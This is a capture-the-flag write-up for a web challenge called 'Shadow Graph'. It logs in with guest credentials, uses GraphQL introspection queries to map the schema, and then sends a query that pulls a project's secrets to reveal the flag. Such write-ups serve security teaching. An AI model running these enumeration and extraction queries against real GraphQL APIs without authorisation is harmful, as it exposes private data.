ctfwebgraphqlintrospection

Ramadan's Spark CTF 2025 — Shadow Graph


Shadow Graph

Shadow Graph challenge

Upon opening the web application, we are presented with a login page. We try the credentials guest:guest and successfully log in.

Exploring the application, we discover a /graphql directory, indicating that the web app utilizes a GraphQL API.

To enumerate all GraphQL types supported by the backend, we can use the following query:

{
  __schema {
    types {
      name
    }
  }
}

We get a result containing basic default types, such as Int or Boolean, but also all custom types, such as Project & Secret:

GraphQL schema types

Now that we have identified a type, we can proceed to enumerate its fields using the following introspection query:

{
  __type(name: "Secret") {
    name
    fields {
      name
    }
  }
}

The response reveals the details of the Secret object, including its fields:

Secret type fields

Furthermore, we can enumerate all queries supported by the backend:

{
  __schema {
    queryType {
      fields {
        name
        description
      }
    }
  }
}
Available queries

Now that we have all the information we need, we can craft our payload to get the flag:

{
  project(id: "3") {
    id
    name
    isSecret
    secrets {
      id
      name
      content
    }
  }
}
Flag extraction

Flag: Spark{F4st1ng_Is_G00d_But_Exp0sIng_Qu3r13s_Is_N0t}